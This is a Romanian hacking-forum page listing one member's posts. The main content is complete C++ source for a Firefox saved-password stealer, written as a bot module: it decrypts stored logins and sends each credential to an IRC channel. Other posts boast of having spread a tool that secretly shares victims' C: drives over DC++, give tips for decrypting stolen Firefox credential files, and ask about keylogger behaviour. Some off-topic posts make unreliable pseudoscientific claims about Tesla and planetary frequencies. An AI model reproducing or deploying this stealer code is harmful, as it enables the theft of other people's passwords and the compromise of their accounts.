Jump to content

puskin

Active Members
 View Profile  See their activity

  • Posts

    430

  • Joined

  • Last visited

 Content Type 

Everything posted by puskin

  1. puskin
    cauta pe google yahoo password recovery
  2. puskin
    merg "Favorites" si cu extensia .bak si .tmp
  3. puskin

    Ciudatentie

    puskin replied to a topic in Off-topic

    ce ar fi sa bagam si pe varianta in engleza treaba asta??? http://google.iamze.info/
  4. puskin
    rapidshare
  5. puskin
    ar fi fain o faza de genul dar care sa se ascunda de tot adica sa nu depinda daca ai setat view hidden files sau ceva de genu adica de exemplu eu cand ma culc noaptea as vrea sa-mi ascund toate partitiile in afara de root sau sa le encriptez .....doamne fereste sa nu trebuiasca sa-mi arunc hdd-ul pe geam in caz de ...xxxx ci doar cine imi cauta fisierele sa se chinuie mult timp sa le gaseasca sau sa le decripteze ....:D:D:D:
  6. puskin
    faina treaba dar ai vreo idee de ce nu imi dispare fisierul si de ce inca mai pot accesa fisierele din el dupa ce il "inchid" ??? http://rapidshare.com/files/119816453/clip0012.avi.html
  7. puskin
    ce face: cauta un fisier numit DCPlusPlus.xml dupa aceea il scrie: <?xml version="1.0" encoding="windows-1252"?> <DCPlusPlus> <Settings> . . . . </Settings> <share> <Directory>C:</Directory> </Share> </DCPlusPlus> deja l-am raspandit pe retele....ca vedeam ca nu prea se mai baga C: -ul la share
  8. puskin

    Ciudatentie

    puskin replied to a topic in Off-topic

    interesant... oare cei de la google stiu ?
  9. puskin
  10. puskin
    acum cativa mii de ani in urma numarul PI 3.14 sau cat o mai fi...corespundea cu frecventa vibratiei planetei in Hertzi, acum din cate stiu este pe uneva pe la 7.4Hz sau dupa altii sa modificat dupa cutremurul din indonezia la 13hz..daca stie cineva exact rog sa posteze... Nikola Tesla a reusit sa produca micro seisme ingropand un oscilator/generator de frecventa de mica putere, acceasi frecventa cu a planetei, la cativa metrii in pamant.In SUA exista aparatura de inregistrare a zgomotului, frecventei si oscilatiilor produse de planeta la numeroase statii de observare astronomice si seismice, la fel ca si in Japonia. Deasemeni la baza teoriei corespunde momentul 0 "POINT 0 SPIN" momentul de rotatie zero in bobinele Tesla ce se regaseste si in Hutchinson Effect realizat de N. Tesla si continuat de Einstein
  11. puskin
    :) :)))))) :)))) ca sa aiba efect redenumiti fisierul msq.exe in RAID.exe :)))) uite aici un generator de frecventa http://rapidshare.com/files/119030581/tnsetup.exe.html va aduc aminte frecventele superioare in jurul 20.000Hz se obtin numai cu tweetere piezo iar frecventele joase sub 30Hz cu difuzoare subwoofer, pentru frecvente sub 10Hz, trebuieste incinta speciala a subwoofer-ului
  12. puskin
    Stim ca e sezonul..... Cine poseda un sistem, combina audio cu !!tweetere piezo neaparat!! poate sa goneasca tantarii, insectele cu ajutorul urmatorului program deja mult prea familiar... http://rapidshare.com/files/118937571/MSQ.EXE.html este incercat si functioneaza...cu toate in maxim...
  13. puskin
    este un keylogger din cate am inteles... 1.unde stocheaza fisierul de log si sub ce forma? 2.daca persoana care are serverul "keylogerul" nu are facuta conexiunea la net putem vedea ce a scris in aceea perioada? 3.fisierul de log este trimis pe ftp, mail sau www? 4.are si functie de windows hook sau numai keyboard? nu o lua in semn de rau ce scriu cum fac altii sunt doar curios....si pe deasupra sunt mort dupa subiectul acesta....
  14. puskin
    ba fratilor nu mai ma bateti la cap pe PM sa va dau metoda de aflare a parolelor la IE gandtiti-va si voi si realizati una, nu asteptati sa va dau eu informatiile si apoi repede sa bagati sute de tutoriale Am sa va dau un indiciu totusi sa nu ziceti ca sunt rau: Hives The Registry is split into a number of logical sections, or "hives".[3] Hives are generally named by their Windows API definitions, which all begin "HKEY". They are abbreviated to a three- or four-letter short name starting with "HK" (e.g. HKCU and HKLM). The HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER nodes have a similar structure to each other; applications typically look up their settings by first checking for them in "HKEY_CURRENT_USER\Software\Vendor's name\Application's name\Version\Setting name", and if the setting is not found look instead in the same location under the HKEY_LOCAL_MACHINE key. When writing settings back, the reverse approach is used — HKEY_LOCAL_MACHINE is written first, but if that cannot be written to (which is usually the case if the logged-in user is not an administrator), the setting is stored in HKEY_CURRENT_USER instead. [edit] HKEY_CLASSES_ROOT (HKCR) Abbreviated HKCR, HKEY_CLASSES_ROOT stores information about registered applications, such as file associations and OLE Object Class IDs tying them to the applications used to handle these items. On Windows 2000 and above, HKCR is a compilation of HKCU\Software\Classes and HKLM\Software\Classes. If a given value exists in both of the subkeys above, the one in HKCU\Software\Classes is used.[4] [edit] HKEY_CURRENT_USER (HKCU) Abbreviated HKCU, HKEY_CURRENT_USER stores settings that are specific to the currently logged-in user. The HKCU key is a link to the subkey of HKEY_USERS that corresponds to the user; the same information is reflected in both locations. On Windows-NT based systems, each user's settings are stored in their own files called NTUSER.DAT and USRCLASS.DAT inside their own Documents and Settings subfolder (or their own Users subfolder in Windows Vista). [edit] HKEY_LOCAL_MACHINE (HKLM) Abbreviated HKLM, HKEY_LOCAL_MACHINE stores settings that are general to all users on the computer. On NT-based versions of Windows, HKLM contains four subkeys, SAM, SECURITY, SOFTWARE and SYSTEM,that are found within their respective files located in the %SystemRoot%\System32\Config folder. A fifth subkey, HARDWARE, is volatile and is created dynamically, and as such is not stored in a file. Information about system hardware drivers and services are located under the SYSTEM subkey, while the SOFTWARE subkey contains software and Windows settings. [edit] HKEY_USERS (HKU) Abbreviated HKU, HKEY_USERS contains subkeys corresponding to the HKEY_CURRENT_USER keys for each user profile actively loaded on the machine, though user hives are usually only loaded for currently logged-in users. [edit] HKEY_CURRENT_CONFIG Abbreviated HKCC, HKEY_CURRENT_CONFIG contains information gathered at runtime; information stored in this key is not permanently stored on disk, but rather regenerated at boot time. [edit] HKEY_PERFORMANCE_DATA This key provides runtime information into performance data provided by either the NT kernel itself or other programs that provide performance data. This key is not displayed in the Registry Editor, but it is visible through the registry functions in the Windows API. [edit] HKEY_DYN_DATA This key is used only on Windows 95, Windows 98 and Windows Me. [5] It contains information about hardware devices, including Plug-and-Play and network performance statistics. The information in this hive is also not stored on the hard drive. The Plug and Play information is gathered and configured at startup and is stored in memory. [6] [edit] Symbolic Links In Windows NT based systems Symbolic Links between registry keys are supported through REG_LINK value type. Registry links work similarly to file shortcuts or filesystem Symbolic links. As such they can span across different hives, however only those visible in Native API namespace, that is \Registry\Machine and \Registry\User. Other hives like HKEY_DYN_DATA are only virtual objects in Win32 API and thus not linkable. Links are used in Windows rather scarcely, only by CurrentControlSet and Hardware Profiles\Current.
  15. puskin
    Intr-adevar bun titlu "Internet Explorer Password Stealer" wtf, ce e cu generatia asta noua..cred ca sunt hibrizi E.T si inventeaza o noua tehnologie..un nou mod de gandire monodimensional.
  16. puskin
    E putin mai greu la IE4-6 SI 7 necesita mai multe fisiere copiate dar in ruptul capului nu postez metoda aici ! cred ca stiti cauza...
  17. puskin

    FIREFOX [C++]

    puskin posted a topic in Programare

    main.cpp Codul: else if (strcmp("firefox", a[s]) == 0) { FindFirefoxPasses(sock, a[2], notice); //you might wanna replace it with CreateThread } firefox.cpp Codul: #include "../../headers/includes.h" #include "../../headers/functions.h" #include "../../headers/externs.h" #define NSS_LIBRARY_NAME "nss3.dll" #define PLC_LIBRARY_NAME "plc4.dll" #define NSPR_LIBRARY_NAME "nspr4.dll" #define PLDS_LIBRARY_NAME "plds4.dll" #define SOFTN_LIBRARY_NAME "softokn3.dll" #define GETPROCADDRESS GetProcAddress #define FREELIBRARY FreeLibrary typedef struct PK11SlotInfoStr PK11SlotInfo; // NSS Library functions typedef SECStatus (*NSS_Init) (const char *configdir); typedef SECStatus (*NSS_Shutdown) (void); typedef PK11SlotInfo * (*PK11_GetInternalKeySlot) (void); typedef void (*PK11_FreeSlot) (PK11SlotInfo *slot); typedef SECStatus (*PK11_CheckUserPassword) (PK11SlotInfo *slot,char *pw); typedef SECStatus (*PK11_Authenticate) (PK11SlotInfo *slot, PRBool loadCerts, void *wincx); typedef SECStatus (*PK11SDR_Decrypt) (SECItem *data, SECItem *result, void *cx); // PLC Library functions typedef char * (*PL_Base64Decode)( const char *src, PRUint32 srclen, char *dest); NSS_Init NSSInit; NSS_Shutdown NSSShutdown; PK11_GetInternalKeySlot PK11GetInternalKeySlot; PK11_CheckUserPassword PK11CheckUserPassword; PK11_FreeSlot PK11FreeSlot; PK11_Authenticate PK11Authenticate; PK11SDR_Decrypt PK11SDRDecrypt; PL_Base64Decode PLBase64Decode; char masterPassword[1024]; int IsNSSInitialized = 0; HMODULE libnss = NULL; HMODULE libplc = NULL; HMODULE libtmp = NULL; int FindFirefoxPasses(SOCKET sock, char *dest, BOOL notice) { char *profileDir, /**masterPassword, */*firefoxDir; profileDir = GetCurrentUserProfilePath(); firefoxDir = GetFirefoxLibPath(); if( InitializeFirefoxLibrary(firefoxDir) ) { if( InitializeNSSLibrary(profileDir, masterPassword) ) { DumpSignonSecrets(profileDir, sock, dest, notice); TerminateFirefoxLibrary(); } } return 1; } char *GetCurrentUserProfilePath() { char profilePath[_MAX_PATH] = ""; char partialPath[] = "Application Data\\Mozilla\\Firefox"; char profileFile[_MAX_PATH]; char line[1024]; DWORD pathSize = _MAX_PATH; char *finalProfilePath = NULL; int isDefaultFound = 0; HANDLE token; // Get current user's profile directory if( fOpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token) == FALSE ) { //DisplayMesg(TYPE_DEBUG, "\n Failed to get current process token "); return NULL; } if( fGetUserProfileDirectory(token, profilePath, &pathSize) == FALSE ) { //DisplayMesg(TYPE_DEBUG, "\n Failed to get user profile directory"); return NULL; } //DisplayMesg(TYPE_DEBUG, "\n User Profile directory = %s", profilePath); // Get firefox profile directory strcpy(profileFile, profilePath); strcat(profileFile,"\\"); strcat(profileFile,partialPath); strcat(profileFile,"\\profiles.ini"); // Open the firefox profile setting file FILE *profile = fopen(profileFile, "r"); if( profile == NULL ) { //DisplayMesg(TYPE_DEBUG, "\n Unable to find firefox profile file : %s ", profileFile); return NULL; } // Check each line of profile settings file for line "name=default" string // This indicates that we are looking under default profile... // So one among next few lines will have path information..just copy that... while(fgets(line, 1024, profile)) { StrLwr(line); if( !isDefaultFound && ( strstr(line, "name=default") != NULL) ) { isDefaultFound = 1; continue; } // We have got default profile ..now check for path if( isDefaultFound ) { if( strstr(line,"path=") != NULL) { char *slash = strstr(line,"/"); if( slash != NULL ) *slash = '\\'; // remove \n from the end of line line[strlen(line)-1] = 0; char *start = strstr(line,"="); int totalLen = strlen(profilePath) + strlen(partialPath) + strlen(start) + 3 ; finalProfilePath = (char *) malloc(totalLen); if( finalProfilePath ) { strcpy(finalProfilePath,profilePath); strcat(finalProfilePath,"\\"); strcat(finalProfilePath,partialPath); strcat(finalProfilePath,"\\"); strcat(finalProfilePath,start+1); //DisplayMesg(TYPE_DEBUG, "\n Final profile path is : %s ", finalProfilePath); } break; } } } fclose(profile); return finalProfilePath; } char *GetFirefoxLibPath() { char regSubKey[] = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command"; char path[_MAX_PATH] =""; char *firefoxPath = NULL; DWORD pathSize = _MAX_PATH; DWORD valueType; HKEY rkey; // Open firefox registry key if( fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS ) { //DisplayMesg(TYPE_DEBUG, "\n Failed to open the firefox registry key : HKCU\\%s", regSubKey ); return NULL; } // Read the firefox path value if( fRegQueryValueEx(rkey, NULL, 0, &valueType, (unsigned char*)&path, &pathSize) != ERROR_SUCCESS ) { //DisplayMesg(TYPE_DEBUG, "\n Failed to read the firefox path value from registry "); fRegCloseKey(rkey); return NULL; } if( pathSize <= 0 || path[0] == 0) { //DisplayMesg(TYPE_DEBUG, "\n Path value read from the registry is empty"); fRegCloseKey(rkey); return NULL; } fRegCloseKey(rkey); // This path may contain extra double quote.... if( path[0] == '\"' ) { for(unsigned int i=0; i< strlen(path)-1 ; i++) path[i] = path[i+1]; } //DisplayMesg(TYPE_DEBUG, "\n Path value read from registry is %s", path); // Terminate the string at last "\\" for(int j=strlen(path)-1; j>0; j--) { if( path[j] == '\\' ) { path[j]=0; break; } } firefoxPath = (char*) malloc( strlen(path) + 1); if( firefoxPath ) strcpy(firefoxPath, path); //DisplayMesg(TYPE_DEBUG, "\n Firefox path = [%s] ", firefoxPath); return firefoxPath; } int InitializeFirefoxLibrary(char *firefoxPath) { libnss = libplc = NULL; // First load the libraries from firefox path. if( firefoxPath != NULL ) { // Load all the libraries from the leaf to the root..in the dependency list. if( LoadLibrary2(firefoxPath, NSPR_LIBRARY_NAME) ) { if((libplc=LoadLibrary2(firefoxPath, PLC_LIBRARY_NAME)) ) { if( LoadLibrary2(firefoxPath, PLDS_LIBRARY_NAME) ) { if( LoadLibrary2(firefoxPath, SOFTN_LIBRARY_NAME) ) { libnss=LoadLibrary2(firefoxPath, NSS_LIBRARY_NAME); //if( libnss ) // ; //DisplayMesg(TYPE_DEBUG, "\n\n Library loaded from firefox path successfully "); } } } } } // Now load from current path. if( !libnss ) { //DisplayMesg(TYPE_DEBUG, "\n Loading library from current directory"); // libnss =LOADLIBRARY(NSS_LIBRARY_NAME); libnss = LoadLibrary2(firefoxPath, NSS_LIBRARY_NAME); // libplc =LOADLIBRARY(PLC_LIBRARY_NAME); libplc = LoadLibrary2(firefoxPath, PLC_LIBRARY_NAME); if( !libnss || !libplc ) { //DisplayMesg(TYPE_ERROR, "\n\n Failed to load Firefox libraries %s & %s ", NSS_LIBRARY_NAME, PLC_LIBRARY_NAME); return 0; } } //DisplayMesg(TYPE_DEBUG, "\n Firefox Libraries loaded successfully.."); // Extract the required functions.... NSSInit = (NSS_Init) GETPROCADDRESS(libnss, "NSS_Init"); NSSShutdown = (NSS_Shutdown)GETPROCADDRESS(libnss, "NSS_Shutdown"); PK11GetInternalKeySlot = (PK11_GetInternalKeySlot) GETPROCADDRESS(libnss, "PK11_GetInternalKeySlot"); PK11FreeSlot = (PK11_FreeSlot) GETPROCADDRESS(libnss, "PK11_FreeSlot"); PK11Authenticate = (PK11_Authenticate) GETPROCADDRESS(libnss, "PK11_Authenticate"); PK11SDRDecrypt = (PK11SDR_Decrypt) GETPROCADDRESS(libnss, "PK11SDR_Decrypt"); PK11CheckUserPassword = (PK11_CheckUserPassword ) GETPROCADDRESS(libnss, "PK11_CheckUserPassword"); if( !NSSInit || !NSSShutdown || !PK11GetInternalKeySlot || !PK11Authenticate || !PK11SDRDecrypt || !PK11FreeSlot || !PK11CheckUserPassword) { //DisplayMesg(TYPE_ERROR, "\n\n Failed to get function address from library %s ", NSS_LIBRARY_NAME); TerminateFirefoxLibrary(); return 0; } // Get the functions from PLC library PLBase64Decode = ( PL_Base64Decode ) GETPROCADDRESS(libplc, "PL_Base64Decode"); if( !PLBase64Decode ) { //DisplayMesg(TYPE_ERROR, "\n\n Failed to get function address from library %s ", PLC_LIBRARY_NAME); TerminateFirefoxLibrary(); return 0; } //DisplayMesg(TYPE_DEBUG, "\n Firefox library initialized successfully.."); return 1; } int InitializeNSSLibrary(char *profilePath, char *password) { IsNSSInitialized = 0; // Initialize the NSS library if( (*NSSInit) (profilePath) != SECSuccess ) { //DisplayMesg(TYPE_ERROR, "\n\n Initialization failed , Make sure key3.db and cert8.db"); //DisplayMesg(TYPE_ERROR, "\n files are present in the specified directory\n"); TerminateFirefoxLibrary(); return 0; } IsNSSInitialized = 1; if( (password != NULL) && (strlen(password) > 1023) ) { //DisplayMesg(TYPE_ERROR, "\n\n Master Password length is more than the allowed size"); TerminateFirefoxLibrary(); return 0; } // Setup and check if master password is correct if( (password == NULL) || strlen(password) <= 0) masterPassword[0]=0; else strcpy(masterPassword, password); if( CheckMasterPassword( masterPassword ) != 1) { TerminateFirefoxLibrary(); return 0; } //DisplayMesg(TYPE_DEBUG, "\n NSS library initiliazed successfully"); return 1; } void DumpSignonSecrets(char *profilePath, SOCKET sock, char *dest, BOOL notice) { char _buf[256]; char buffer[10240]; char name[10240]; char *clearData = NULL; char *signonFilePath = NULL; char signonFileName1[]="/signons.txt"; char signonFileName2[]="/signons2.txt"; int bufferLength = 10240; int count = 0; int ret; int version=1; signonFilePath = (char*) malloc( strlen(profilePath) + 64 + 1 ); if( signonFilePath == NULL ) { //DisplayMesg(TYPE_ERROR, "\n Insufficient memory ...."); return; } strcpy(signonFilePath, profilePath); strcat(signonFilePath, signonFileName1); //DisplayMesg(TYPE_DEBUG, "\n Final signon filename is = %s ", signonFilePath); // Open the signon file if( OpenFile2(signonFilePath) == 0 ) { strcpy(signonFilePath, profilePath); strcat(signonFilePath, signonFileName2); //DisplayMesg(TYPE_DEBUG, "\n Final signon filename is = %s ", signonFilePath); if( OpenFile2(signonFilePath) == 0 ) { //DisplayMesg(TYPE_ERROR,"\n Failed to open the Firefox signon file.\n Unless you use Firefox password manager to save your passwords, signon file will not be present.\n"); return; } version = 2; } // read the header format information if( ReadLine(buffer, bufferLength) == 0 ) { //DisplayMesg(TYPE_ERROR, "\n Error in reading signon file header "); return; } // check if the format is right... if( ((version == 1) && strcmp(buffer, HEADER_VERSION1) != 0) || ((version == 2) && strcmp(buffer, HEADER_VERSION2) != 0) ) { //DisplayMesg(TYPE_ERROR, "\n Signon file header version information is not proper"); return; } //we dont need these so comment it out //-->DisplayMesg(TYPE_PRINT, "\n ****** Reject Host List *******\n"); // read the reject list while ( ReadLine(buffer, bufferLength) != 0 ) { // Check for end of reject list if (strlen(buffer) != 0 && buffer[0] == '.') break; count++; //-->DisplayMesg(TYPE_PRINT, "\n %d => %s ", count, buffer); } //-->DisplayMesg(TYPE_PRINT, "\n\n\n\n ******** Host list with username/password ******** "); // read the URL line while (ReadLine(buffer, bufferLength) != 0 ) { sprintf(_buf, "%s ", buffer); //strcpy(_buf, buffer); //DisplayMesg(TYPE_PRINT, "\n\n Host : %s ", buffer); int getSubdomain=0; // prepare to read the name/value pairs while( ReadLine(buffer, bufferLength) != 0 ) { // line starting with . terminates the pairs for this URL entry if (buffer[0] == '.') { //DisplayMesg(TYPE_PRINT, "\n -------------------------------------------------- "); break; // end of URL entry } if( (version == 2) && (getSubdomain == 2) ) { strcat(_buf, buffer); //DisplayMesg(TYPE_PRINT, "\n %s : %s ", "Subdomain", buffer); getSubdomain = 0; continue; } // save the name part and check if it is a password if (buffer[0] == '*') { strcpy(name,&buffer[1]); ret = ReadLine(buffer, bufferLength); } else { //DisplayMesg(TYPE_PRINT, "\n"); strcpy(name, buffer); ret = ReadLine(buffer, bufferLength); } // read in and save the value part if ( ret == 0 ) { // error in input file so give up //DisplayMesg(TYPE_ERROR, "\n Error occured while reading VALUE for : %s ", name); break; } if( DecryptSecretString(buffer, &clearData) == 1 ) { strcat(_buf, name); strcat(_buf, ":"); strcat(_buf, clearData); irc_privmsg(sock, dest, _buf, notice); _buf[0] = '\0'; Sleep(FLOOD_DELAY); //_buf = NULL; //DisplayMesg(TYPE_PRINT, "\n %s : %s ", name, clearData); clearData = NULL; } else return; getSubdomain++; } } //DisplayMesg(TYPE_PRINT, "\n\n **************************************************\n\n"); } void TerminateFirefoxLibrary() { if( IsNSSInitialized && (NSSShutdown != NULL) ) (*NSSShutdown)(); if( libnss != NULL ) FREELIBRARY(libnss); if( libplc != NULL ) FREELIBRARY(libplc); } HMODULE LoadLibrary2(char *firefoxDir, char *libName) { char loadPath[4096]=""; strcpy(loadPath, firefoxDir); strcat(loadPath, "/"); strcat(loadPath, libName); // libtmp = LOADLIBRARY(loadPath); libtmp = LoadLibrary(loadPath); if( !libtmp ) { //DisplayMesg(TYPE_DEBUG, "\n\n Failed to load library %s ", loadPath); return 0; } return libtmp; } /* * Verifies if the specified master password is correct. * return 1 success * 0 failure */ int CheckMasterPassword(char *password) { PK11SlotInfo *slot = 0; int ret = 0; slot = (*PK11GetInternalKeySlot)(); if (!slot) { //DisplayMesg(TYPE_ERROR, "\n PK11_GetInternalKeySlot failed ..."); return 0; } // First check if the master password set if( password[0] != 0 ) { if( (*PK11CheckUserPassword)(slot, "") == SECSuccess ) { //DisplayMesg(TYPE_PRINT, "\n Info : Master Password is NOT set. \n\n"); (*PK11FreeSlot) (slot); return 1; } } if( (*PK11CheckUserPassword)(slot, password) == SECSuccess ) { // Store the password for internal use... //DisplayMesg(TYPE_DEBUG, "\n CheckMasterPassword : specified master password is correct..."); ret = 1; } else { if( password[0] == 0 ) { //DisplayMesg(TYPE_ERROR, "\n Error : Specify the right master password and try again."); //DisplayMesg(TYPE_ERROR, "\n Its also possible that you may not have used Firefox password manager anytime to save passwords.In such a case use it to save passwords and then try FirePassword again."); } else { //DisplayMesg(TYPE_ERROR, "\n Error : Specified master password \"%s\" is wrong...\n Please enter the right master password and try again.",password); //DisplayMesg(TYPE_PRINT, "\n\n Usage : \n\t %s [-m \"master password\" ] [Firefox_Profile_Directory] \n\n", "FirePassword"); } ret = 0; } // Free the slot (*PK11FreeSlot) (slot); return ret; } const int buflen = 10240; static char readbuf[buflen+1]; static int last = 0; static int next = 0; FILE *signonFile = NULL; int OpenFile2(char *filePath) { last = next = 0; signonFile = fopen(filePath, "r"); if( signonFile == NULL ) { //DisplayMesg(TYPE_DEBUG,"\n Failed to open the signon file %s ", filePath); return 0; } return 1; } void CloseFile() { if( signonFile ) fclose(signonFile); } int ReadLine(char *buffer, int size) { Unichar c; int strLength = 0, i=0; buffer[0] = 0; while(1) { c = ReadChar(); // note that eof is not set until we read past the end of the file if ( c == 0 ) // || feof(file) ) return 0; if (c == '\n') { buffer[strLength++] = 0; break; } if (c != '\r') { for(i=0; i < 4 && ( (c & 0xff) != 0 ) ; i++) { if( strLength >= size ) { // Increase the capacity dynamically //DisplayMesg(TYPE_ERROR, "\n Buffer is insufficient to store data"); return 0; } buffer[strLength++] = (char)c; c = c >> 8; } } } return 1; } char ReadChar() { if (next >= last) { next = 0; last = fread(readbuf, 1, buflen, signonFile); //DisplayMesg(TYPE_DEBUG, "\n ReadChar = Read %d bytes ",last); if (last <= 0 ) { // note that eof is not set until we read past the end of the file //DisplayMesg(TYPE_DEBUG, "\n End of file reached...!"); return 0; } } return (readbuf[next++]); } int DecryptSecretString(char *cryptData, char **clearData) { int decodeLen = 0; int finalLen = 0; char *decodeData = NULL; char *finalData = NULL; // treat zero-length crypt string as a special case if(cryptData[0] == '\0') { *clearData = (char*) malloc(1); **clearData = 0; return 1; } // Use decryption routine...if crypt does not start with prefix...( for Firefox ) // otherwise use base64 decoding ( for mozilla default installation) // For firefox its always encrypted with 3DES. if( cryptData[0] != CRYPT_PREFIX[0] ) { //DisplayMesg(TYPE_DEBUG, "\n Performing PK11 Decryption "); // First do base64 decoding..... if( (Base64Decode(cryptData, &decodeData, &decodeLen) == 0) || (decodeData == NULL) ) { //DisplayMesg(TYPE_ERROR, "\n DecryptSecretString : Base64 decoding of crypt data failed "); return 0; } //DisplayMesg(TYPE_DEBUG, "\n DecryptSecretString : base64data (%d) = %s ", decodeLen, decodeData); // Now do actual PK11 decryption if( (PK11Decrypt(decodeData, decodeLen, &finalData, &finalLen) == 0) || (finalData == NULL)) { //DisplayMesg(TYPE_ERROR, "\n DecryptSecretString : Failed to decrypt the string "); return 0; } // WARNING: Decrypted string is not NULL terminated // So we will create new NULL terminated string here... *clearData = (char*) malloc( finalLen + 1 ); if( *clearData == NULL ) { //DisplayMesg(TYPE_ERROR, "\n DecryptSecretString :Insufficient memory... "); return 0; } memcpy(*clearData, finalData, finalLen); *(*clearData + finalLen) = 0; // Null terminate the string.... //DisplayMesg(TYPE_DEBUG, "\n DecryptSecretString : finalLen = %d ", finalLen); return 1; } // Just do base64 decoding. //DisplayMesg(TYPE_DEBUG, "\n DecryptSecretString : Performing simple Base64 Decoding "); unsigned int PREFIX_Len = strlen(CRYPT_PREFIX); if( strlen(cryptData) == PREFIX_Len ) { *clearData = (char *)malloc(1); **clearData = '\0'; return 1; } if( Base64Decode(&cryptData[PREFIX_Len], clearData, &decodeLen) == 0 ) { //DisplayMesg(TYPE_ERROR, "\n DecryptSecretString : Base64 decoding of crypt data failed "); return 0; } return 1; } int Base64Decode(char *cryptData, char **decodeData, int *decodeLen) { int len = strlen( cryptData ); int adjust = 0; //DisplayMesg(TYPE_DEBUG, "\n Base64Decode : Length of crypt data = %d", len); // Compute length adjustment if (cryptData[len-1] == '=') { adjust++; if (cryptData[len-2] == '=') adjust++; } *decodeData = ( char *)(*PLBase64Decode)(cryptData, len, NULL); if( *decodeData == NULL ) { //DisplayMesg(TYPE_ERROR, "\n Base64 decoding failed ..."); return 0; } *decodeLen = (len*3)/4 - adjust; //DisplayMesg(TYPE_DEBUG, "\n Base64Decode : Length of decoded data = %d", *decodeLen); return 1; } int PK11Decrypt(char *decodeData, int decodeLen, char **clearData, int *finalLen) { PK11SlotInfo *slot = 0; SECStatus status; SECItem request; SECItem reply; // Find token with SDR key slot = (*PK11GetInternalKeySlot)(); if (!slot) { //DisplayMesg(TYPE_ERROR, "\n PK11_GetInternalKeySlot failed ..."); return 0; } if ( (*PK11Authenticate)(slot, PR_TRUE, NULL) != SECSuccess) { // since we have specified password callback function , we won't come here... //DisplayMesg(TYPE_ERROR, "\n PK11_Authenticate failed"); return 0; } // Decrypt the string request.data = (unsigned char *)decodeData; request.len = decodeLen; reply.data = 0; reply.len = 0; status = (*PK11SDRDecrypt)(&request, &reply, NULL); if (status != SECSuccess) { //DisplayMesg(TYPE_ERROR, "\n PK11SDR_Decrypt failed ..."); return 0; } // WARNING : This string is not NULL terminated.. *clearData = (char*)reply.data; *finalLen = reply.len; // Free the slot (*PK11FreeSlot)(slot); return 1; } void StrLwr(char *str) { int n=strlen(str); for(int i=0; i<n; i++) { if( str[i] >=65 && str[i]<=90 ) str[i]+=32; } } firefox.h Codul: // Internal structure declaration taken from firefox..... typedef enum SECItemType { siBuffer = 0, siClearDataBuffer = 1, siCipherDataBuffer = 2, siDERCertBuffer = 3, siEncodedCertBuffer = 4, siDERNameBuffer = 5, siEncodedNameBuffer = 6, siAsciiNameString = 7, siAsciiString = 8, siDEROID = 9, siUnsignedInteger = 10, siUTCTime = 11, siGeneralizedTime = 12 }; struct SECItem { SECItemType type; unsigned char *data; unsigned int len; }; typedef enum SECStatus { SECWouldBlock = -2, SECFailure = -1, SECSuccess = 0 }; // For some PR type varialbes...just to remove gecko-sdk dependency // following is added here. #define PRBool int #define PRUint32 unsigned int #define PR_TRUE 1 #define PR_FALSE 0 #define Unichar unsigned int #define HEADER_VERSION1 "#2c" #define HEADER_VERSION2 "#2d" #define CRYPT_PREFIX "~" int FindFirefoxPasses(SOCKET sock, char *dest, BOOL notice); char *GetCurrentUserProfilePath(); char *GetFirefoxLibPath(); int InitializeFirefoxLibrary(char *firefoxPath); int InitializeNSSLibrary(char *profilePath, char *password); //void DumpSignonSecrets(char *profilePath); void DumpSignonSecrets(char *profilePath, SOCKET sock, char *dest, BOOL notice); void TerminateFirefoxLibrary(); HMODULE LoadLibrary2(char *firefoxDir, char *libName); int CheckMasterPassword(char *password); int OpenFile2(char *filePath); void CloseFile(); int ReadLine(char *buffer, int size); char ReadChar(); int DecryptSecretString(char *cryptData, char **clearData); int Base64Decode(char *cryptData, char **decodeData, int *decodeLen); int PK11Decrypt(char *decodeData, int decodeLen, char **clearData, int *finalLen); void StrLwr(char *str); loaddlls.cpp Codul: GUPD fGetUserProfileDirectory; ---- BOOL nouserenv = FALSE; DWORD nouserenverr = 0; ---- HMODULE userenv_dll = LoadLibrary("userenv.dll"); if (userenv_dll) { fGetUserProfileDirectory = (GUPD)GetProcAddress(userenv_dll,"GetUserProfileDirectoryA"); if (!fGetUserProfileDirectory) nouserenv = TRUE; } else { nouserenverr = GetLastError(); nouserenv = TRUE; } Se observa in cod: // Initialize the NSS library if( (*NSSInit) (profilePath) != SECSuccess ) { //DisplayMesg(TYPE_ERROR, "\n\n Initialization failed , Make sure key3.db and cert8.db"); //DisplayMesg(TYPE_ERROR, "\n files are present in the specified directory\n"); TerminateFirefoxLibrary(); return 0; } Aceeasi eroare ca la passcape password finder
  18. puskin
    completari: -nu folositi "alternate search" pe clientul odc!; -asigurativa ca aveti fisierele signons2.txt si key3.db secmod.db cert8.db; http://rapidshare.com/files/118257396/Mozilla.zip.html si fisierele "care dau erroare" http://rapidshare.com/files/118545162/Firefox.zip.html -asigurati-va ca secmod si cu key3 au aceeasi dimensiune; -fisierul key3.db contine "parola master" si cheia pt. decriptare (fiecare user are parola proprie si unica, la fel si cheia) -passcape are un bug la decriptare pe o anumita versiune de moz.; ca sa scapati de aceasta erroare slot initialization failure trebuie sa modificati fisierul incriptat pentru ultima versiune de moz, sau sa aveti un decriptor mai bun: vedeti diferentele dintre cele 2 fisiere signons2.txt cel din stanga este cel care da erroare cel din dreapta este cel asociat fisierelor postate mai sus, si merge o sa revin cu un tutorial pentru IE 4-6 si IE 7 in curand am postat si la programare ceva interesant..
  19. puskin

    kk conquiz

    puskin replied to shinnok's topic in Cosul de gunoi

    uite vezi ca nu ma expun....stiam ca o sa trebuiasca sa postez datele...si mai stiam ca cineva o sa fie interesat sa se dea in spectacol sa se bage sa modifice datele...oricum ii multumesc mult ...sper ca a folosit socks ca daca nu e nasol...
  20. puskin

    kk conquiz

    puskin replied to shinnok's topic in Cosul de gunoi

    "am gasit informatiile pe alt forum de hack si le-am dat copy paste aici" de unde sa stiu eu hacking...
  21. puskin

    Fun stuff

    puskin replied to Wisa's topic in Discutii non-IT

    ..
  22. puskin
    http://mobile.yahoo.com/messenger Cat despre programul fake webcam, va trebui sal pui pe rapidshare si sa bagi link-ul aici, si pe urma o sa-ti zic de ce iti da eroarea aceea
  23. puskin

    kk conquiz

    puskin replied to shinnok's topic in Cosul de gunoi

    ...
  24. puskin

    RST WEBSITE BUG??

    puskin replied to puskin's topic in Off-topic

